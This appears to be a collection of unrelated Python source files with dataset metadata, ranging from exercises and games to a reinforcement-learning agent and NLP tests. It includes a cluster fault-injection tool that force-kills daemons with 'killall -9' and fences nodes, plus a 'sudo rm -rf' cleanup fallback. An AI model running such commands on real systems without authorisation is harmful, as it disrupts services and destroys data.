print(\"%s交了%s元的学费\" %(self.name,amount))\n\n\nschool = School(\"小张IT\",\"图景\")\nt1 = Teacher(\"小张\",22,'女',20000,\"东北话\")\nt2 = Teacher(\"小金\",23,'男',30000,'python')\n\n\ns1 = Student(\"小小张\",'12','女',1,'python')\ns2 = Student(\"小小金\",'13','男',2,'东北话')\n\nt1.tell()\ns1.tell()\nschool.enrool(s1)\nschool.enrool(s2)\nschool.hire(t1)\nschool.hire(t2)\nprint(school.students)\nprint(school.teacher)","sub_path":"test/继承-实例.py","file_name":"继承-实例.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"112245971","text":"#!/usr/bin/env python3\nimport sys\nimport re\nimport argparse\nimport functools\nimport getpass\nimport time\nimport threading\nfrom datetime import datetime\n\nfrom . import check\nfrom . import config\nfrom . import pam\nfrom . 
import utils\n\n\nclass Context(object):\n def __setattr__(self, name, value):\n super().__setattr__(name, value)\n\n\ndef login(func):\n @functools.wraps(func)\n def login_func(*args, **kwargs):\n if config.LOGIN:\n print(\"###############\")\n else:\n username = config.LOGIN_USER if config.LOGIN_USER else input(\"User name: \")\n if username == \"\" or username != \"hacluster\":\n utils.msg_error(\"User name is error!\")\n sys.exit(1)\n password = config.LOGIN_PASSWORD if config.LOGIN_PASSWORD else getpass.getpass()\n\n pam_instance = pam.pam()\n pam_instance.authenticate(username, password)\n if pam_instance.code != 0:\n utils.msg_error(pam_instance.reason)\n sys.exit(pam_instance.code)\n print(\"###############\")\n config.LOGIN = True\n\n func(*args, **kwargs)\n\n return login_func\n\n\ndef kill_testcase(context):\n '''\n --kill-sbd: restarted or fenced\n --kill-sbd -l fenced\n --kill-corosync restarted or fenced\n --kill-corosync -l fenced\n --kill-pacemakerd restarted\n --kill-pacemakerd -l blocked by bsc#1111692\n '''\n def print_header(context):\n print(\"Testcase: Force Kill \\\"{}\\\"\".format(context.current_kill))\n print(\"Expected Results: {}\".format(context.expected))\n print(\"Looping: {}\".format(context.loop))\n print(context.note)\n\n def check_restarted(context):\n count = 0\n while count < 10:\n rc, pid = utils.get_process_status(context.current_kill)\n if rc:\n utils.msg_info(\"Process {}({}) is restarted!\".format(context.current_kill, pid))\n return\n time.sleep(0.5)\n count += 1\n utils.msg_error(\"Process {} is not restarted!\".format(context.current_kill))\n\n def kill(context):\n if \"Fenced\" in context.expected and not utils.fence_enabled():\n utils.msg_error(\"stonith is not enabled!\")\n sys.exit(1)\n\n while True:\n if not is_process_running(context):\n continue\n\n utils.msg_warn(\"Trying to run \\\"{}\\\"\".format(context.cmd))\n utils.run_cmd(context.cmd)\n\n if not context.loop:\n break\n # endless loop will lead to fence\n\n thread_check = threading.Thread(target=utils.anyone_kill, args=(utils.me(), ))\n thread_check.start()\n check_restarted(context)\n\n\n expected = {\n 'sbd': ('''a) sbd process restarted\n b) This node fenced.''', 'This node fenced'),\n 'corosync': ('''a) corosync process restarted\n b) This node fenced.''', 'This node fenced'),\n 'pacemakerd': ('pacemakerd process restarted', None),\n }\n\n note = '''\\nNOTE: The final report will explain the cluster behavior according to each test case.\n Some behavior might be not so obvious, and could be a bit complex indeed.'''\n\n for case in ('sbd', 'corosync', 'pacemakerd'):\n if getattr(context, case):\n if case == 'pacemakerd' and context.loop:\n return #blocked by bsc#1111692\n\n context.current_kill = case\n context.expected = expected[case][1] if context.loop else expected[case][0]\n context.cmd = r'killall -9 {}'.format(case)\n context.note = note\n\n print_header(context)\n if not utils.ask(\"Run?\"):\n return\n\n kill(context)\n\n\ndef fence_node(context):\n if not context.fence_node:\n return\n\n # check required commands exists\n required_commands = ['crm_node', 'stonith_admin', 'crm_attribute']\n for cmd in required_commands:\n if not utils.which(cmd):\n sys.exit(1)\n\n node = context.fence_node\n # check crm_node command\n if not utils.check_node_status(node, 'member'):\n utils.msg_error(\"Node \\\"{}\\\" not in cluster!\".format(node))\n sys.exit(1)\n\n fence_enabled, fence_action, fence_timeout = utils.get_fence_info()\n # check whether stonith is enabled\n if not 
fence_enabled:\n utils.msg_error(\"stonith is not enabled!\")\n sys.exit(1)\n # get stonith action\n if not fence_action:\n sys.exit(1)\n if not fence_timeout:\n fence_timeout = config.FENCE_TIMEOUT\n\n print(\"Testcase: Fence node \\\"{}\\\"\".format(node))\n print(\"Expect Results: {}\".format(fence_action))\n print(\"Fence Timeout: {}\".format(fence_timeout))\n if not utils.ask(\"Run?\"):\n return\n utils.msg_warn(\"Trying to fence node \\\"{}\\\"\".format(node))\n\n thread_check = threading.Thread(target=utils.anyone_kill, args=(node, fence_timeout))\n utils.run_cmd(config.FENCE_NODE.format(node), wait=False)\n if node == utils.me():\n # fence self\n utils.msg_info(\"Waiting {}s for self {}...\".format(fence_timeout, fence_action))\n thread_check.start()\n\n time.sleep(int(fence_timeout))\n utils.msg_error(\"Am I Still live?:(\")\n sys.exit(1)\n else:\n # fence other node\n utils.msg_info(\"Waiting {}s for node \\\"{}\\\" {}...\".format(fence_timeout, node, fence_action))\n thread_check.start()\n\n count = 0\n while count < int(fence_timeout):\n if utils.check_node_status(node, 'lost'):\n utils.msg_info(\"Node \\\"{}\\\" has been fenced successfully\".format(node))\n return\n time.sleep(1)\n count += 1\n utils.msg_error(\"Node \\\"{}\\\" Still alive?:(\".format(node))\n sys.exit(1)\n\n\ndef is_process_running(context):\n rc, pid = utils.get_process_status(context.current_kill)\n if not rc:\n return False\n utils.msg_info(\"Process {}({}) is running...\".format(context.current_kill, pid))\n return True\n\n\ndef parse_argument(context):\n parser = argparse.ArgumentParser(description='Cluster Testing Tool Set',\n allow_abbrev=False,\n add_help=False)\n\n parser.add_argument('-e', '--env-check', dest='env_check', action='store_true',\n help='Check environment')\n parser.add_argument('-c', '--cluster-check', dest='cluster_check', action='store_true',\n help='Check cluster state')\n\n group_mutual = parser.add_mutually_exclusive_group()\n group_mutual.add_argument('--kill-sbd', dest='sbd', action='store_true',\n help='kill sbd daemon')\n group_mutual.add_argument('--kill-corosync', dest='corosync', action='store_true',\n help='kill corosync daemon')\n group_mutual.add_argument('--kill-pacemakerd', dest='pacemakerd', action='store_true',\n help='kill pacemakerd daemon')\n group_mutual.add_argument('--fence-node', dest='fence_node', metavar='NODE',\n help='Fence specific node')\n parser.add_argument('-l', '--kill-loop', dest='loop', action='store_true',\n help='kill process in loop')\n\n other_options = parser.add_argument_group('other options')\n other_options.add_argument('-d', '--debug', dest='debug', action='store_true',\n help='Print verbose debugging information')\n other_options.add_argument('-y', '--yes', dest='yes', action='store_true',\n help='Answer \"yes\" if asked to run the test')\n '''\n other_options.add_argument('-u', dest='user', metavar='USER',\n help='User for login')\n other_options.add_argument('-p', dest='password', metavar='PASSWORD',\n help='Password for login')\n '''\n other_options.add_argument('-h', '--help', dest='help', action='store_true',\n help='show this help message and exit')\n\n args = parser.parse_args()\n if args.help:\n parser.print_help()\n sys.exit(0)\n for arg in vars(args):\n setattr(context, arg, getattr(args, arg))\n\n\ndef run(context):\n parse_argument(context)\n\n try:\n check.check(context)\n kill_testcase(context)\n fence_node(context)\n\n except KeyboardInterrupt:\n print(\"\\nCtrl-C, leaving\")\n sys.exit(1)\n\n\nctx = 
Context()\n","sub_path":"cluster_test_tool/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159263355","text":"'''\nProblem : Minimum number of Appends needed to make a string palindrome\n\n'''\n\n# Checking if the String is palindrome or not\n\n\ndef isPalindrome(Str):\n    Len = len(Str)\n\n    # single character is always palindrome\n    if (Len == 1):\n        return True\n\n    # pointing to first character\n    ptr1 = 0\n    # pointing to last character\n    ptr2 = Len - 1\n\n    while (ptr2 > ptr1):\n        if (Str[ptr1] != Str[ptr2]):\n            return False\n        ptr1 += 1\n        ptr2 -= 1\n    return True\n\n# Recursive function to count number of appends\n\n\ndef noOfAppends(s):\n    if (isPalindrome(s)):\n        return 0\n\n    # Removing first character of String by\n    # incrementing base address pointer.\n    del s[0]\n    return 1 + noOfAppends(s)\n\n\nif __name__ == \"__main__\":\n    se = \"abede\"\n    s = [i for i in se]\n    print(noOfAppends(s))\n","sub_path":"alok-tripathi-workplace/set2/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"434768974","text":"\"\"\"\nExercise 15\nA group of friends stays at a hotel, and when paying they split the expenses\nas follows:\na. Iván pays 40 %\nb. German pays 33 %\nc. Esteban pays 55 % of what Iván paid\nd. Hernán pays the rest\n\"\"\"\ntotal_a_pagar = float(input(\"The total to pay in pesos is: \"))\nivan_paga = total_a_pagar * 0.4\ngerman_paga = total_a_pagar * 0.33\nesteban_paga = ivan_paga * 0.55\nHernan_paga = total_a_pagar - esteban_paga - german_paga - ivan_paga\n\nprint(\"Ivan pays \", ivan_paga, \"German pays \", german_paga, \"Esteban pays\", esteban_paga, 'Hernan pays', Hernan_paga)","sub_path":"Trabajo Práctico 1/TP1_E15.py","file_name":"TP1_E15.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"458116958","text":"# coding=utf-8\n# Copyright 2021 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"C51 agent with fixed replay buffer(s).\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nfrom batch_rl.fixed_replay.replay_memory import fixed_replay_buffer\nfrom dopamine.agents.rainbow import rainbow_agent\nimport gin\nimport tensorflow.compat.v1 as tf\n\n\n@gin.configurable\nclass FixedReplayRainbowAgent(rainbow_agent.RainbowAgent):\n  \"\"\"An implementation of the Rainbow agent with fixed replay buffer(s).\"\"\"\n\n  def __init__(self, sess, num_actions, replay_data_dir, replay_suffix=None,\n               init_checkpoint_dir=None, **kwargs):\n    \"\"\"Initializes the agent and constructs the components of its graph.\n\n    Args:\n      sess: tf.Session, for executing ops.\n      num_actions: int, number of actions the agent can take at any 
state.\n replay_data_dir: str, log Directory from which to load the replay buffer.\n replay_suffix: int, If not None, then only load the replay buffer\n corresponding to the specific suffix in data directory.\n init_checkpoint_dir: str, directory from which initial checkpoint before\n training is loaded if there doesn't exist any checkpoint in the current\n agent directory. If None, no initial checkpoint is loaded.\n **kwargs: Arbitrary keyword arguments.\n \"\"\"\n assert replay_data_dir is not None\n tf.logging.info(\n 'Creating FixedReplayAgent with replay directory: %s', replay_data_dir)\n tf.logging.info('\\t init_checkpoint_dir %s', init_checkpoint_dir)\n tf.logging.info('\\t replay_suffix %s', replay_suffix)\n # Set replay_log_dir before calling parent's initializer\n self._replay_data_dir = replay_data_dir\n self._replay_suffix = replay_suffix\n if init_checkpoint_dir is not None:\n self._init_checkpoint_dir = os.path.join(\n init_checkpoint_dir, 'checkpoints')\n else:\n self._init_checkpoint_dir = None\n\n super(FixedReplayRainbowAgent, self).__init__(sess, num_actions, **kwargs)\n\n def step(self, reward, observation):\n \"\"\"Records the most recent transition and returns the agent's next action.\n\n Args:\n reward: float, the reward received from the agent's most recent action.\n observation: numpy array, the most recent observation.\n\n Returns:\n int, the selected action.\n \"\"\"\n self._record_observation(observation)\n self.action = self._select_action()\n return self.action\n\n def end_episode(self, reward):\n assert self.eval_mode, 'Eval mode is not set to be True.'\n super(FixedReplayRainbowAgent, self).end_episode(reward)\n\n def _build_replay_buffer(self, use_staging):\n \"\"\"Creates the replay buffer used by the agent.\"\"\"\n\n return fixed_replay_buffer.WrappedFixedReplayBuffer(\n data_dir=self._replay_data_dir,\n replay_suffix=self._replay_suffix,\n observation_shape=self.observation_shape,\n stack_size=self.stack_size,\n use_staging=use_staging,\n update_horizon=self.update_horizon,\n gamma=self.gamma,\n observation_dtype=self.observation_dtype.as_numpy_dtype)\n","sub_path":"batch_rl/fixed_replay/agents/rainbow_agent.py","file_name":"rainbow_agent.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"267648300","text":"import collections\n\nclass Solution:\n def pyramidTransition(self, bottom: str, allowed) -> bool:\n table = collections.defaultdict(set)\n\n for s in allowed:\n pre = s[:2]\n table[pre].add(s[2:])\n return self.helper(bottom, [], table, 1)\n\n def helper(self, cur, nxt, table, i):\n if len(cur) == 1:\n return True\n\n if len(nxt) + 1 == len(cur):\n return self.helper(nxt, [], table, 1)\n\n node = \"\".join(cur[i - 1:i + 1])\n for ch in table[node]:\n if self.helper(cur, nxt + [ch], table, i + 1):\n return True\n return False\n\n\n\n\n","sub_path":"LeetcodeNew/python/LC_756.py","file_name":"LC_756.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"311142043","text":"from __future__ import print_function\n\nfrom contextlib import contextmanager\nimport errno\nimport logging\nimport os\nfrom shutil import (\n copytree,\n rmtree,\n)\nimport subprocess\nfrom time import time\nfrom tempfile import mkdtemp\nimport uuid\nimport yaml\n\n\n@contextmanager\ndef temp_dir(parent=None):\n directory = mkdtemp(dir=parent, prefix='cwr_tst_')\n try:\n yield directory\n 
finally:\n try:\n rmtree(directory)\n except OSError:\n run_command('sudo rm -rf {}'.format(directory))\n\n\ndef configure_logging(log_level):\n logging.basicConfig(\n level=log_level, format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n\ndef ensure_dir(path, parent=None):\n path = os.path.join(parent, path) if parent else path\n try:\n os.mkdir(path)\n return path\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\n\ndef run_command(command, verbose=True):\n \"\"\"Execute a command and maybe print the output.\"\"\"\n if isinstance(command, str):\n command = command.split()\n if verbose:\n logging.info('Executing: {}'.format(command))\n proc = subprocess.Popen(command, stdout=subprocess.PIPE)\n output = ''\n while proc.poll() is None:\n try:\n for status in proc.stdout:\n logging.info(status.rstrip())\n output += status\n except IOError:\n # SIGTERM/SIGINT generates io error\n pass\n if proc.returncode != 0 and proc.returncode is not None:\n output, error = proc.communicate()\n logging.info(\"ERROR: run_command failed: {}\".format(error))\n e = subprocess.CalledProcessError(proc.returncode, command, error)\n e.stderr = error\n raise e\n return output\n\n\ndef get_juju_home():\n home = os.environ.get('JUJU_HOME')\n if home is None:\n home = os.path.join(os.environ.get('HOME'), 'cloud-city')\n return home\n\n\ndef copytree_force(src, dst, ignore=None):\n if os.path.exists(dst):\n rmtree(dst)\n copytree(src, dst, ignore=ignore)\n\n\ndef generate_controller_names(controllers):\n names = []\n prefix = 'cwr-'\n for name in controllers:\n if name.startswith('cwr-'):\n names.append(name)\n else:\n names.append('{}{}'.format(prefix, name))\n return names\n\n\ndef rename_env(from_env, to_env, env_path):\n with open(env_path, 'r') as f:\n env = yaml.load(f)\n new_env = to_env + from_env\n env['environments'][new_env] = env['environments'].pop(from_env)\n with open(env_path, 'w') as f:\n yaml.dump(env, f, indent=4, default_flow_style=False)\n return new_env\n\n\ndef juju_run(command, args='', e=''):\n e = '-e {}'.format(e) if e else e\n return run_command('juju {} {} {}'.format(command, e, args))\n\n\ndef juju_status(e=''):\n return juju_run('status', e=e)\n\n\ndef generate_test_id():\n return uuid.uuid4().hex\n\n\ndef cloud_from_env(env):\n env = env.lower()\n if 'aws' in env:\n if 'china' in env:\n return 'aws-china'\n return 'aws/sa-east-1'\n if 'azure' in env:\n return 'azure/northeurope'\n if 'gce' in env or 'google' in env:\n return 'google/europe-west1'\n if 'joyent' in env:\n return 'joyent/us-sw-1'\n if 'power8' in env or 'borbein-maas' in env:\n return 'borbein-maas'\n if 'ob-maas' in env or 'maas-ob' in env:\n return 'ob-maas'\n if 'prodstack' in env:\n return 'prodstack45'\n return None\n\n\ndef get_temp_controller_name(controller_name):\n suffix = os.environ.get('BUILD_NUMBER') or str(time()).split('.')[0]\n return \"{}-{}\".format(controller_name, suffix)\n","sub_path":"buildcloud/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"575643410","text":"from PyQt5.QtWidgets import QApplication, QMainWindow\nfrom login import login_inter, valida_login\nfrom servicos import servicos\nimport sys\n\n#classe principal\nclass Main(QMainWindow, login_inter.Ui_MainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n super().setupUi(self)\n\n self.btnlogin.clicked.connect(self.logar)\n 
self.btnsair.clicked.connect(self.saindo)\n\n def logar(self):\n em = self.inputemail.text()\n sh = self.inputsenha.text()\n self.user = valida_login.Login(em, sh)\n self.proxjan = servicos.Servicos(self.user)\n self.proxjan.show()\n self.hide()\n\n @staticmethod\n def saindo():\n sys.exit()\n\n\nif __name__ == '__main__':\n qt= QApplication(sys.argv)\n ma = Main()\n ma.show()\n qt.exec_()\n","sub_path":"Archer Adm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"125715205","text":"#--- Exercicio 1 - Input, Estrutura de decisão e operações matemáticas\n#--- Crie um programa que leia dois números inteiros\n#--- Realize as 4 operações matemáticas básicas com os números lidos\n#--- Imprima os resultados das operações \n#--- Informe qual número é maior ou se os dois são iguais\n\nx = int(input('Informe o primeiro número\\n'))\ny = int(input('Informe o segundo número\\n'))\n\nsoma = x + y\nsub = x - y\nmulti = x * y\ndiv = x / y\n\nprint(f'Adição: {soma}\\nSubtração: {sub}\\nMultiplicação: {multi}\\nDivisão: {div}')\n\nif(x > y):\n print(f'O primeiro número ({x}) é maior que o segundo número ({y})')\nelif(y > x):\n print(f'O segundo número ({y}) é maior que o primeiro número ({x})')\nelif(x == y):\n print('Os dois números são iguais')","sub_path":"exercicios/exercicio1.py","file_name":"exercicio1.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"649154850","text":"\n\nclass Settings(object):\n\n def __init__(self):\n self.width = 1024\n self.height = 800\n self.bg_color = (220,220,220)\n self.speed = 1.5\n self.bullet_speed = 5\n self.bullet_width = 3\n self.bullet_height = 5\n self.bullet_color = (60,60,60)\n\n self.monster_speed = 2\n self.max_monster_count = 3\n\n\n\nbullet_speed = 5\nbullet_width = 3\nbullet_height = 5\nbullet_color = (60,60,60)\n\n\nmonster_speed = 2\nmax_monster_count = 3","sub_path":"src/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"18668823","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 18 13:54:37 2018\n\n@author: arpitansh\n\"\"\"\n\n'''\nThe Fibonacci Sequence is computed based on the following formula:\n\n\nf(n)=0 if n=0\nf(n)=1 if n=1\nf(n)=f(n-1)+f(n-2) if n>1\n\nPlease write a program using list comprehension to print the Fibonacci Sequence \nin comma separated form with a given n input by console.\n\nExample:\nIf the following n is given as input to the program:\n\n7\n\nThen, the output of the program should be:\n\n0,1,1,2,3,5,8,13\n'''\n\ndef fibo(n):\n if n==0:\n return 0\n elif n==1:\n return 1\n else:\n return fibo(n-2)+fibo(n-1)\n \nn = int(input('Enter value of n: '))\nvalue = [str(fibo(x)) for x in range (0,n+1)]\nprint(','.join(value))\n \n","sub_path":"q61.py","file_name":"q61.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47278454","text":"# video 182. 
Screen Setup and Creating a Snake Body\n\nfrom turtle import Screen, Turtle\nimport time\n\nscreen = Screen()\nscreen.setup(width = 600, height = 600)\nscreen.bgcolor(\"black\")\nscreen.title(\"Welcome to my Snake Game\")\n\n# set tracer == 0, wait for we drawing the while picture\nscreen.tracer(0)\n\nstart_positions = [(0, 0), (-20, 0), (-40, 0)]\n\nsegments = []\n\nfor position in start_positions:\n new_segment = Turtle(shape = \"square\")\n new_segment.color(\"white\")\n new_segment.penup()\n new_segment.goto(position)\n segments.append(new_segment)\n\nscreen.update()\n\ngame_is_on = True\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n \n # moving strategy\n # let n cube move to n-1 position\n # and let the first cube follow the key instruction/original setting\n for seg_num in range(len(segments)-1, 0, -1):\n new_x, new_y = segments[seg_num - 1].xcor(), segments[seg_num - 1].ycor()\n segments[seg_num].goto(new_x, new_y)\n \n segments[0].forward(20)\n # segments[0].backward(20)\n \n \n\n\nscreen.exitonclick()","sub_path":"Day020/v182.py","file_name":"v182.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"314196474","text":"\"\"\" This demo program solves a hyperelastic problem. It is implemented\nin Python by Johan Hake following the C++ demo by Harish Narayanan\"\"\"\n\n# Copyright (C) 2008-2010 Johan Hake and Garth N. Wells\n#\n# This file is part of DOLFIN.\n#\n# DOLFIN is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# DOLFIN is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with DOLFIN. 
If not, see .\n#\n# Modified by Harish Narayanan 2009\n# Modified by Anders Logg 2011\n#\n# First added: 2009-10-11\n# Last changed: 2012-11-12\n\n# Begin demo\n\nfrom dolfin import *\nimport numpy as np\n\n# Optimization options for the form compiler\nparameters[\"form_compiler\"][\"cpp_optimize\"] = True\nffc_options = {\"optimize\": True}#, \\\n# \"precompute_ip_const\": True}\n# \"eliminate_zeros\": True, \\\n# \"precompute_basis_const\": True, \\\n\n# Create mesh and define function space\nmesh = UnitCubeMesh(8, 8, 8)\n#mesh = UnitCubeMesh(24, 16, 16)\n\nV_space = VectorFunctionSpace(mesh, \"Lagrange\", 1)\n\n# Define functions\n#du = TrialFunction(V) # Incremental displacement\n#v = TestFunction(V) # Test function\n#u = Function(V) # Displacement from previous iteration\n\n# Test whether solution can be loaded into mixed function space.\nV_element = VectorElement(\"CG\", mesh.ufl_cell() , 1)\nmixed_element = FunctionSpace(mesh, MixedElement([V_element, V_element]))\n\nV = TestFunction(mixed_element)\ndU = TrialFunction(mixed_element)\nU = Function(mixed_element)\nU0 = Function(mixed_element)\n\nxi, eta = split(V)\nu, v = split(U)\n\n#u0, v0 = U0.split(deepcopy = True)\nu0 = Function(V_space)\n_u0 = np.loadtxt('twisty_downloaded.txt', dtype = float)\n_u0 = np.loadtxt('twisty.txt', dtype = float)\n\nu0.vector()[:] = _u0[:]\n#_u02 = np.concatenate((_u0 ,0.0*_u0),axis = 0)\n\n#U.vector()[:] = _u02\n#u, v1 = U.split(deepcopy = True)\n\n# Load initial conditions to u0 and v0. Otherwise set to 0.\n#u0 = Constant((0,)*V_space.mesh().geometry().dim())\nv0 = Constant((0,)*V_space.mesh().geometry().dim())\n\n# Functions for solver\nxi, eta = split(V) \t# Test functions\nu, v = split(U)\t\t# Functions\n\ncells = CellFunction(\"size_t\", mesh)\ndx = Measure('dx', domain = mesh, subdomain_data = cells)\n\n# Project u0 and v0 into U0\na_proj = inner(dU, V)*dx\nL_proj = inner(u0, xi)*dx + inner(v0, eta)*dx\nsolve(a_proj == L_proj, U0)\n\nu0, v0 = U0.split(deepcopy = True)\n\n# Mark boundary subdomians\nleft = CompiledSubDomain(\"near(x[0], side) && on_boundary\", side = 0.0)\nright = CompiledSubDomain(\"near(x[0], side) && on_boundary\", side = 1.0)\n\n# Define Dirichlet boundary (x = 0 or x = 1)\nc = Expression((\"0.0\", \"0.0\", \"0.0\"), degree=2)\nr = Expression((\"scale*0.0\",\n \"scale*(y0 + (x[1] - y0)*cos(theta) - (x[2] - z0)*sin(theta) - x[1])\",\n \"scale*(z0 + (x[1] - y0)*sin(theta) + (x[2] - z0)*cos(theta) - x[2])\"),\n scale = 0.5, y0 = 0.5, z0 = 0.5, theta = pi/3, degree=2)\n#r = Expression((\"0.0\", \"0.0\", \"0.0\"), degree=2)\n\n#clamp = Constant((0.0, 0.0, 0.0))\n#bcl = DirichletBC(V, clamp, left)\n\n#bcl = DirichletBC(V, c, left)\n#bcr = DirichletBC(V, r, right)\n\n#bcs = [bcl, bcr]\n#bcs = [bcl]\n\n\n\n\nB = Constant((0.0, -0.5, 0.0)) # Body force per unit volume\n#B = Constant((0.0, 0.0, 0.0)) # Body force per unit volume\n#T = Constant((0.1, 0.1, 0.1)) # Traction force on the boundary\nT = Constant((0.1, 0.0, 0.0)) # Traction force on the boundary\n\n# Kinematics\nd = u.geometric_dimension()\nI = Identity(d) # Identity tensor\nF = I + grad(u) # Deformation gradient\nC = F.T*F # Right Cauchy-Green tensor\n\nE = (C - I)/2\nE = variable(E)\n\n# Invariants of deformation tensors\nIc = tr(C)\nJ = det(F)\n\n# Elasticity parameters\n#E, nu = 10.0, 0.3\n#mu, lmbda = Constant(E/(2*(1 + nu))), Constant(E*nu/((1 + nu)*(1 - 2*nu)))\n\nmu = Constant(3.85)\nlmbda = Constant(5.77)\n\n# Stored strain energy density (compressible neo-Hookean model)\n#psi = (mu/2)*(Ic - 3) - mu*ln(J) + 
(lmbda/2)*(ln(J))**2\n\n# (st venant model)\npsi = lmbda/2*(tr(E)**2)+mu*tr(E*E)\n\n# Total potential energy\nPi = psi*dx - dot(B, u)*dx - dot(T, u)*ds\n\n# Compute first variation of Pi (directional derivative about u in the direction of v)\nF = derivative(Pi, u, v)\n\n# Compute Jacobian of F\nJ = derivative(F, u, du)\n\n# Solve variational problem\n#solve(F == 0, u, bcs, J=J,\n# form_compiler_parameters=ffc_options)\n\n# Save solution in VTK format\nfile = File(\"results/displacement.pvd\");\n\nU.assign(U0)\nu, v = U.split()\nfile << u;\n\n# save displacement field\n#u_txt = u.vector().array()\n#u_txt = u.vector().get_local()\n\n#np.savetxt('twisty.txt', u_txt)\n\n# Plot and hold solution\n#plot(u, mode = \"displacement\", interactive = True)\n","sub_path":"4_Structure_test/demo_hyperelasticity/demo_hyperelasticity.py","file_name":"demo_hyperelasticity.py","file_ext":"py","file_size_in_byte":5141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"342667771","text":"import concurrent.futures\n\nimport pytest\n\nfrom rhoknp import KNP, Document, Jumanpp, RegexSenter, Sentence\n\nis_knp_available = KNP().is_available()\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\ndef test_call() -> None:\n knp = KNP()\n text = \"外国人参政権\"\n assert isinstance(knp(text), Document)\n assert isinstance(knp(Document.from_raw_text(text)), Document)\n assert isinstance(knp(Sentence.from_raw_text(text)), Sentence)\n with pytest.raises(TypeError):\n knp(1) # type: ignore\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\ndef test_apply() -> None:\n knp = KNP()\n text = \"外国人参政権\"\n assert isinstance(knp.apply(text), Document)\n assert isinstance(knp.apply(Document.from_raw_text(text)), Document)\n assert isinstance(knp.apply(Sentence.from_raw_text(text)), Sentence)\n with pytest.raises(TypeError):\n knp.apply(1) # type: ignore\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\n@pytest.mark.parametrize(\n \"text\",\n [\n \"外国人参政権\",\n \"望遠鏡で泳いでいる少女を見た。\",\n \"エネルギーを素敵にENEOS\", # EOS\n \"Canon EOS 80D買った\", # EOS\n '\"最高\"の気分', # double quotes\n \"<tag>エス'ケープ\", # escape\n \"\\\\エス'ケープ\", # backslash\n \"キャリッジ\\rリターン\", # carriage return\n \"ライン\\nフィード\", # line feed\n \"CR\\r\\nLF\", # CR+LF\n ],\n)\ndef test_apply_to_sentence(text: str) -> None:\n knp = KNP()\n sent = knp.apply_to_sentence(text)\n assert sent.text == text.replace(\"\\r\", \"\").replace(\"\\n\", \"\")\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\ndef test_thread_safe() -> None:\n knp = KNP()\n texts = [\"外国人参政権\", \"望遠鏡で泳いでいる少女を見た。\", \"エネルギーを素敵にENEOS\"]\n texts *= 10\n with concurrent.futures.ThreadPoolExecutor() as executor:\n futures = [executor.submit(knp.apply_to_sentence, text) for text in texts]\n for i, future in enumerate(futures):\n sentence = future.result()\n assert sentence.text == texts[i]\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\n@pytest.mark.parametrize(\n \"text\",\n [\n \"外国人参政権\",\n \"望遠鏡で泳いでいる少女を見た。\",\n \"エネルギーを素敵にENEOS\", # EOS\n \"Canon EOS 80D買った\", # EOS\n '\"最高\"の気分', # double quotes\n \"<tag>エス'ケープ\", # escape\n \"\\\\エス'ケープ\", # backslash\n \"キャリッジ\\rリターン\", # carriage return\n \"ライン\\nフィード\", # line feed\n \"CR\\r\\nLF\", # CR+LF\n ],\n)\ndef test_apply_to_document(text: 